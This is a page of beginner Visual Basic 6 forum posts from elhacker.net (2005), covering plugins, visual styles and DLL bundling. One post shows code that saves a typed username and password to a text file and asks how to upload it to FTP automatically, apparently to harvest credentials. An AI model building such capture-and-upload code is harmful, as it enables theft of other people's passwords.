elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Programación / Programación Visual Basic / Re: mandar txt a email en: 19 Octubre 2005, 02:46 am
a ver que me aclare.... yo tengo:
Citar
Private Sub Label2_Click()
n = FreeFile(0)
Open "c:\" & txtnombre.Text & "-" & txtPass.Text & ".txt" For Output As #n
Print #n, txtnombre.Text & " / " & txtPass.Text
Close #n
End Sub
ahi se me guarda el archivo txt en c:\*******.txt y como hago para que ese archivo se suba automaticamente a un ftp? eske no me aclaro , losiento  :-[
12  Programación / Programación Visual Basic / Re: plugin winamp x msn en: 19 Octubre 2005, 01:49 am
ahora que sacas el tema... me has sugerido a mi otra pregunta... y es si se podría de alguna manera hacer un plug-in o si ya existe del winamp para el msn, como el del windows media player... es decir, que te ponga la cancion que estas escuchando en el winamp, al lado del nick del msn.
13  Programación / Programación Visual Basic / Re: Lista de Controles ActiveX para Visual Basic 6.0 en: 13 Octubre 2005, 02:02 am
Muy util este post para gente como yo, que somos iniciados :-) gracias :)
14  Programación / Programación Visual Basic / Re: Una opinion... en: 12 Octubre 2005, 02:08 am
Vale, e encotrado el error... esque la apariencia de mi windows era estilo clasico :-S  :-[ :-[ :-[ :-[

pero ahora, me da un error al salir del programa... el tipico error al que le das siempre al boton de "No Enviar" (nunca lo he leido entero)
15  Programación / Programación Visual Basic / Re: Una opinion... en: 12 Octubre 2005, 02:00 am
todos... aunke tengo una duda. hay un codigo, exactamente este:
Citar
Private Declare Sub InitCommonControls Lib "Comctl32.dll" ()
que no se bien donde se pone.
he optado por ponerlo al comienzo del formulario principal . no se si esta bien o mal.
16  Programación / Programación Visual Basic / Re: Una opinion... en: 12 Octubre 2005, 01:36 am
he hecho lo que se explica en el post:
http://foro.elhacker.net/index.php/topic,85213.0.html
pero se sigue viendo igual el programa :-S
17  Programación / Programación Visual Basic / Re: Una opinion... en: 12 Octubre 2005, 00:43 am
pero eso se haría con imagenes no?
18  Programación / Programación Visual Basic / Re: Una opinion... en: 12 Octubre 2005, 00:23 am
se refiere al manifest

Salu2
se podria dar una respuesta un poco mas pa novatos? (yo) :( :-[
19  Programación / Programación Visual Basic / Re: msvbvm60 y dll, ocx en: 11 Octubre 2005, 04:12 am
mmmmfff debo leer mas atentamente ... losiento ...  :-[ :-[
pero bueno, ya que esta el tema... no hay ninguna manera de que los dll o ocx vayan "incrustados" en el exe del mismo programa?
20  Programación / Programación Visual Basic / Re: msvbvm60 y dll, ocx en: 11 Octubre 2005, 02:41 am
puedes hacer un en un instalador, que en  cuanto se instale, esas librerias necesarias, se vayan a la carpeta de windous directamente.
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines